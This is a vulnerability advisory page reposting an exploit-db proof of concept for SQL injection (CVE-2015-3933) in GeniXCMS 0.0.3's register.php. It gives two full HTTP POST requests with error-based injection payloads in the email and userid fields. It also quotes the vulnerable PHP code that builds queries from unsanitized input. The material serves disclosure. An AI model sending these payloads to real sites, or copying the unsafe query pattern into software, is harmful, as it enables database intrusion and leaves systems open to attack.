GeniXCMS 0.0.3 SQL Injection

2015.06.28
Credit: cfreer
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2015-3933
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Genixcms register.php multiple SQL vuln # Date: 2015-06-23 # Exploit Author: cfreer (poc-lab) # Vendor Homepage: http://www.genixcms.org # Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip # Version: 0.0.3 # Tested on: Apache/2.4.7 (Win32) # CVE : CVE-2015-3933 ===================== SOFTWARE DESCRIPTION ===================== Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS. ============================= VULNERABILITY: SQL Injection ============================= Poc? 1?Genixcms register.php email SQL vuln HTTP Data Stream POST /genixcms/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 199 email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab \inc\lib\User.class.php public static function is_email($vars){ if(isset($_GET['act']) && $_GET['act'] == 'edit'){ $where = "AND `id` != '{$_GET['id']}' "; }else{ $where = ''; } $e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}' {$where}"); if(Db::$num_rows > 0){ return false; }else{ return true; } } ============================================================================================================================================== 2?Genixcms register.php userid SQL vuln HTTP Data Stream POST /genixcms/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 224 email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org &register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' \inc\lib\User.class.php public static function is_exist($user) { if(isset($_GET['act']) && $_GET['act'] == 'edit'){ $where = "AND `id` != '{$_GET['id']}' "; }else{ $where = ''; } $usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` = '{$user}' {$where} "); $n = Db::$num_rows; if($n > 0 ){ return false; }else{ return true; } } referer: https://www.exploit-db.com/exploits/37363/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top